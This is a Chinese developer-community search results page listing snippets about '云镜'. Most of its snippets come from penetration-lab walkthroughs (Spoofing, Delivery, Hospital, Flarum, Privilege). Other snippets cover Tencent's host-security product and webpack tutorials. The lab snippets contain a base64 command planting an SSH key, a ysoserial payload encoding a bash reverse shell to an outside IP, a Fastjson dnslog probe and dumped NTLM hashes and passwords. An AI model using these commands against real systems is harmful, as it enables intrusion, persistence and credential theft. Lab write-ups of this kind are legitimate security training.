- 综合排序
- 最热优先
- 最新优先
- 来自专栏很菜的web狗
春秋云镜-Spoofing
工作期间某天项目经理找到,需要给客户录一个靶场的WP要求写详细一些过程,项目经理说云镜难度还是可以的,所以丢了一个Spoofing。但尴尬的是,当时平没有很快完成任务,实在是姿势盲区了(本人太菜了。 +gPW+BRQUJiiXymM9P1Pu46xc+ITjXndvFUm/LjKwcmlqSPI7EWIEFwWzxPfNeWpjqJSYb6KkYgf3n+zvvKmX+A6CDZZ4Kl0ABV+8dkYML Jz5IQql8YdAgKCpHMoiV/bGwVTkCDRhuUXL1TW2m7pwXUw9RWM3i8G8WKnpMfQtsYXIo0Qatxx0Lxq3bpIEdkSKGTptGyCuvZCouUd5cpUpJJ4yrW8I0Jg9Zqqifsc2iRrwK6zcW7pHkLAkksEZC2DyM78iR5Fl4Z .ssh/authorized_keys 在进行base64加密 ZWNobyAic3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCZ1FDakU1eUc4YXlvODhhR3FyOW9OT2E0c2ZMSFJMK2dQVytCUlFVSmlpWHltTTlQMVB1NDZ4YytJVGpYbmR2RlVtL0xqS3djbWxxU1BJN0VXSUVGd1d6eFBmTmVXcGpxSlNZYjZLa1lnZjNuK3p2dkttWCtBNkNEWlo0S2wwQUJWKzhka1lNTC9KejVJUXFsOFlkQWdLQ3BITW9pVi9iR3dWVGtDRFJodVVYTDFUVzJtN3B3WFV3OVJXTTNpOEc4V0tucE1mUXRzWVhJbzBRYXR4eDBMeHEzYnBJRWRrU0tHVHB0R3lDdXZaQ291VWQ1Y3BVcEpKNHlyVzhJMEpnOVpxcWlmc2MyaVJyd0s2emNXN3BIa0xBa2tzRVpDMkR5TTc4aVI1Rmw0Wi9QS2lKSFdZaFRoVEZ4QnlWc2lrcDMxcTJnZkFUQ3gxdmptejZ0bTNBQS9CUGtyV3RKMXhZOWl6c2psdTQ2TGRoVE1EMVU4Qm5KVWhTdVRVZDJsQUtqcDlxS2tscDE1d2ZkQmJEazRTeFdhNkJOdHdvNnYxVkRJZlJrbVBNaHpVNXlubTFPUXNPTEpLclJKSHQwb0pmcmFiRDJlNlVaK0RVU3lBOEhhMkUxRkppWGJ5a3FhNnZWOVRIYjZMbHRBcmhoRk5pa1I0MmNxeFVIMVEvcW9NOGJHMDA9IiA Runtime.getRuntime().exec("bash -c {echo,ZWNobyAic3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCZ1FDakU1eUc4YXlvODhhR3FyOW9OT2E0c2ZMSFJMK2dQVytCUlFVSmlpWHltTTlQMVB1NDZ4YytJVGpYbmR2RlVtL0xqS3djbWxxU1BJN0VXSUVGd1d6eFBmTmVXcGpxSlNZYjZLa1lnZjNuK3p2dkttWCtBNkNEWlo0S2wwQUJWKzhka1lNTC9KejVJUXFsOFlkQWdLQ3BITW9pVi9iR3dWVGtDRFJodVVYTDFUVzJtN3B3WFV3OVJXTTNpOEc4V0tucE1mUXRzWVhJbzBRYXR4eDBMeHEzYnBJRWRrU0tHVHB0R3lDdXZaQ291VWQ1Y3BVcEpKNHlyVzhJMEpnOVpxcWlmc2MyaVJyd0s2emNXN3BIa0xBa2tzRVpDMkR5TTc4aVI1Rmw0Wi9QS2lKSFdZaFRoVEZ4QnlWc2lrcDMxcTJnZkFUQ3gxdmptejZ0bTNBQS9CUGtyV3RKMXhZOWl6c2psdTQ2TGRoVE1EMVU4Qm5KVWhTdVRVZDJsQUtqcDlxS2tscDE1d2ZkQmJEazRTeFdhNkJOdHdvNnYxVkRJZlJrbVBNaHpVNXlubTFPUXNPTEpLclJKSHQwb0pmcmFiRDJlNlVaK0RVU3lBOEhhMkUxRkppWGJ5a3FhNnZWOVRIYjZMbHRBcmhoRk5pa1I0MmNxeFVIMVEvcW9NOGJHMDA9IiA
2.4K20编辑于 2023-05-09 - 来自专栏Windows技术交流
排查云镜异常
排查云镜异常,可以收集云镜日志让售后看下C:\Program Files\QCloud\YunJing\log复制该目录,对复制后的目录进行压缩,压缩成.7z格式(压缩率高,压缩文件小,方便传输)云镜的 如果解析到同一个地址,telnet测试反而省事了,如果解析到多个地址,每个地址对应的端口都telnet测试下看看通不通s.yd.qcloud.coml.yd.qcloud.comu.yd.qcloud.com云镜域名的情况比较复杂 ,具体可参考官网文档:https://cloud.tencent.com/document/product/296/12236图片官网文档上虽然对云镜的域名分门别类这么多,但我建议以nslookup或dig
2K40编辑于 2022-06-21 - 来自专栏产品体验优化私房菜课程
主机安全(云镜)产品简介
台以下,可以参考网上的一些文章来加固我们的服务器,如笔者之前整理的《Linux服务器安全加固10条建议》和《Windows服务器安全加固10条建议》等, 如果服务器不断的增加业务快速的膨胀这时就需要借助“云” 的安全力量,那就是“主机安全(云镜)”这款产品。 image.png 开通云主机时可以免费开通“主机安全”防护 image.png 什么是主机安全(云镜) 主机安全基于腾讯安全积累的海量威胁的数据,利用机器学习为用户提供黑客入侵检测和漏洞风险预警等安全防护服务 image.png 云镜的主要功能介绍 概览页面:https://console.cloud.tencent.com/cwp ; 资产列表(需要付费3元/台1天): 直观的看到每台服务器上的端口、账号 image.png 本文参考 云镜产品介绍视频: https://cloud.tencent.com/edu/learning/course-1055-995 主机安全文档:https://cloud.tencent.com
10K42编辑于 2022-04-14 - 来自专栏红蓝对抗
内网渗透-春秋云镜篇(Privilege)
/users/sign_in code:200 len:34961 title:Sign in · GitLab 因此172.22.14.16这个就是Gitlab的部署站,仓库的通用接口是api/v4/ /add' proxychains odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf -- a5 13 60 f8 9f 61 ee 0c 9c b4 ca 97 d7 4c 53 6a 10 4e e7 74 03 51 0a 95 3f 78 af 15 22 5d 7f 0c 10 c9 ca 64 27 b9 df 77 c6 f7 47 19 d7 bb 05 d6 4b ca e6 70 4b 62 5f 1c f8 78 b9 33 a2 f7 9e e5 77 78 db f9 cd b1 73 e9 b2 df 35 67 5e b0 12 85 ac 59 db 4c 53 8e 2d 6a d4 d3 93 f5 61 30 ee f5 53 d0 2a ae cf 50
1.2K10编辑于 2024-04-12 - 来自专栏红蓝对抗
内网渗透之突破云镜-Delivery
ysoserial.exploit.JRMPListener 1098 CommonsCollections6 "bash -c {echo,YmFzaCAtaSAmPiAvZGV2L3RjcC8xMTkuMy4yMTUuMTk4Lzc3NzYgMD4mMQ : [00000003] Primary * Username : WIN-HAUWOLAO$ * Domain : XIAORANG * NTLM : 818d5422a636903a4af503ae49663f57 * SHA1 : d42271bb4d2c9194002f67e5ff296c018d7f565etspkg :Authentication Id : 0 ; 84434 (00000000: 0c00801c30594a1b8eaa889d237c5382 * SHA1 : e8848f8a454e08957ec9814b9709129b7101fad7 * DPAPI : 89b179dc738db098372c365602b7b0f4tspkg
55010编辑于 2024-02-27 - 来自专栏小美娜娜
显微镜下的webpack4入门
STEP 1 INSTALL webpack从4开始,webpack分成了两个包一个webpack一个webpack-cli,所以安装的时候要安装两个包,以及这个包我们是工具,非网站所依赖的包,所以记得放在开发依赖包之中 "scripts": { "start": "webpack --config webpack.config.js" } 复制代码 webpack4开始支持零配置,也就是说我不用写webpack.config.js Learn more: webpack.js.org/concepts/mo… 这个警告就是告诉我们,webpack4中的mode参数默认是production,所以如果是development的情况就一定要配置了 Mode(新增):production和development,这个是webpack4新增的一个属性,用于区分开发版与线上版,也是很贴心的设置了。
80720发布于 2019-04-04 - 来自专栏红蓝对抗
内网渗透 -春秋云镜篇之Hospital
Fastjson,不完整的时候就会出现Fastjson 出现了Fastjson,说明确实是Fastjson,接下来用dnslog探测一下是否存在漏洞 {"qwq":{"@type":"java.net.Inet4Address ","val":"4mmi9n.dnslog.cn"}} 成功收到回显,说明存在Fastjson漏洞。
80910编辑于 2024-03-18 - 来自专栏红蓝对抗
内网渗透-春秋云镜篇之Flarum
Target 172.22.60.42 is alive (icmp) Target 172.22.60.52 is alive [*] Icmp alive hosts len is: 4 不过发现一个更方便的工具 https://github.com/JDArmy/SharpXDecrypt zhangxin admin4qwY38cc 利用Acount Operators组用户拿下主机 [*] NL$KM 0000 8B 14 51 59 D7 67 45 80 9F 4A 54 4C 0D E1 D3 29 ..QY.gE..JTL...) 0010 3E B6 DD 95 B0 60 32 C4 .w ..g1..8...`2. 0030 BE 8E 72 4D 0D 90 01 7F 01 30 AC D7 F8 4C 2B 4A ..rM .....0...L+J NL$KM:8b145159d76745809f4a544c0de1d3293eb6cc22ffb7c5747fe4b0ade7fa900d1b7720d5a66731e99e38dd95b06032c4be8e724d0d90017f0130acd7f84c2b4a
86410编辑于 2024-02-29 - 来自专栏红蓝对抗
内网渗透 -春秋云镜篇之Hospital
Fastjson,不完整的时候就会出现Fastjson 出现了Fastjson,说明确实是Fastjson,接下来用dnslog探测一下是否存在漏洞 {"qwq":{"@type":"java.net.Inet4Address ","val":"4mmi9n.dnslog.cn"}} 成功收到回显,说明存在Fastjson漏洞。
2.2K20编辑于 2024-03-10 - 来自专栏腾讯云开发者社区头条
【腾讯云】云镜-主机安全防护解决方案
image.png 云镜为腾讯云海量用户抵御黑客攻击 image.png 充分利用云的优势对密码破解行为进行拦截和预警 image.png 基于AI的WebShell检测技术 云镜WebShell检测优势 Q:云镜是否会采集我主机上的隐私数据? Q:云镜的客户端稳定性如何,是否会造成业务影响? Q:云镜的漏洞检测覆盖哪些范围,是否可以替代传统扫描器? A:云镜漏洞检测功能主要侧重于高危可造成入侵的漏洞,包括WEB和系统组件,云镜对于新出现的漏洞有较快的响应速度,能在极短的时间内完成全部业务主机检测,可以避免扫描器策略更新滞后和扫描效率低带来的风险,对于历史上的漏洞
26.3K138发布于 2018-08-01 - 来自专栏小美娜娜
显微镜下的webpack4:路径操作
对于打包工具来说,最简单也是最复杂的操作莫过于路径的安排了,原本都在src下的资源,想要打包到dist目录下,但是打包出来的文件路径甚不如人意。明明想要分门别类地放置文件文件,然后却像大杂烩一样js,html,css甚至图片都混在了一起。虽然打包之后运行没什么问题,但是这是要逼死强迫症患者啊。
1K20发布于 2019-04-04 - 来自专栏红蓝对抗
内网渗透—春秋云镜篇之2022网鼎杯
当时在这里卡住了,参考https://fushuling.com/index.php/2023/09/17/%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83%c2%b7%e7%bd e5%86%b3%e8%b5%9b%e6%b2%a1%e6%89%93%e5%ae%8c/ 漏洞探测 首先添加用户,如果能够添加成功就说明漏洞存在,使用工具链接https://github.com/ly4k
92810编辑于 2024-02-27 - 来自专栏红蓝对抗
内网渗透—春秋云镜篇之2022网鼎杯
当时在这里卡住了,参考https://fushuling.com/index.php/2023/09/17/%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83%c2%b7%e7%bd e5%86%b3%e8%b5%9b%e6%b2%a1%e6%89%93%e5%ae%8c/ 漏洞探测 首先添加用户,如果能够添加成功就说明漏洞存在,使用工具链接https://github.com/ly4k
53010编辑于 2024-02-29 - 来自专栏河湾欢儿的专栏
放大镜
放大镜:淘宝等电商页面应用广泛... 思路:先让move块和bimg块隐藏,当鼠标移动到box上时,使move块和bimg块显示,获取鼠标当前的位置,然后经过计算给与move块和bimg块适当的值实现放大镜效果 <! DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>放大镜</title> <style
2K30发布于 2018-09-06 - 来自专栏小美娜娜
显微镜下的webpack4的新特性:mode详解
webpack4支持的一个新特性就是zero配置,不需要config,也可以打包,这对于懒癌患者很有诱惑力,但是这也意味着我们不清楚零配置发生了写什么,也不知道打包出来的文件是否符合我们的心意,全部都是佛系打包 但是无论是在开发环境development下,还是在正式坏境production下,这个代码都是不过关的,对于开发环境,此代码可读性太差,对于正式环境,此代码不够简洁,因此,为了减少一些重复操作,webpack4提供的
1K30发布于 2019-04-04 - 来自专栏悦智云原生压测团队
悬镜安全扫描导致4核cpu负载使用率400%
【背景】 1、某KA项目通过压测执行结果qps24较低,曲线有毛刺,95ht延迟5秒左右较慢,同时看到后端服务4核cpu已打满400%,反馈给研发同学排查问题 接口:/pwp/rest/portalgxhaction getAllAppData 12获取应用列表 吞吐量(req/s):24.34 报错率:0% 95%分位的平均响应时间(ms):5330 并发量:100 持续时间:300s 数据分析:qps24较低,曲线有毛刺,4核 已经全部用完 17:47 调日程,把日程的过滤器调整一下配置 17:49 查看两个过滤器代码 17:51 authorized方法代码更改重写一下这个方法,认证通过返回值为空就可以 18:28 厂商悬镜安全整改完成
1.5K30编辑于 2021-11-28 - 来自专栏腾讯安全
腾讯主机安全(云镜)兵器库:WebShell克星-TAV引擎
TAV WebShell引擎的检测效果 在云上真实WebShell黑样本集中,腾讯TAV引擎的检测贡献率能达到99%以上。 相比于传统的特征检测方案,TAV WebShell检测引擎不仅有着超高的检测率,同时也有超低的误报率,在云上真实环境中,也具备较高的独报能力。 目前腾讯主机安全(云镜)已全面接入TAV WebShell检测能力,使腾讯云主机查杀防御WebShell攻击的能力得以大幅提升。 后续还将陆续接入腾讯安全其他产品,比如腾讯高级威胁检测系统(御界)、Web应用防火墙、云防火墙、零信任iOA等等产品,将全面增强在终端侧、主机侧、流量侧的安全能力。
4.2K20编辑于 2021-12-08 - 来自专栏webTower
放大镜原理
上面代码中,图片没有设置高度,我们在JavaScript中用 img.offsetWidth 来获取。获取之后设置 wrapper 的宽度与 img 的宽度相同。
2.8K10发布于 2019-10-23 - 来自专栏Creator星球游戏开发社区
放大镜效果
它核心是对相机应用,异名基于此实现一个放大镜的demo ? 相机有—个clearFlag如果你设置了,它在绘制画面的时候,会清理屏幕 一般只给前面的相机设置clearFlag;后面相机都不能再设置,不然会把前面相机绘制的内容清除掉 把思路拉回到放大镜demo中, 要实现放大镜,其实就是多创造一个相机去拍摄需要放大的物体,然后调整相机的缩放比例,使投影的物体放大或者缩小对应的倍数,然后配合使用Mask组件去裁剪我们需要的局部位置,mask的编辑器设置请参考项目源码
2.3K30发布于 2020-04-22 - 来自专栏小美娜娜
显微镜下的webpack4:灵魂tapable,终于搞懂钩子系列!
大家在看webpack源码的时候,有没有感觉像再看天书,似乎没有办法一个文件比如webpack.js从头看到尾。感觉webpack的跳跃性很强,完全不知道程序在运行的时候,发生了什么。完全不清楚这个事件是什么时候发生的,比如loader是什么时候执行的,plugin又是什么时候出现的。webpack的程序错综复杂,完全迷失在程序之中。这究竟是为什么呢?其实很简单!因为webpack的灵魂Tapable!这个机制使得webpack异常的灵活,它有一句经典的话——Everything is a plugin!。由此可见webpack是靠插件堆积起来的。而实现这个插件机制的就是Tabable!
1K30发布于 2019-04-04
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号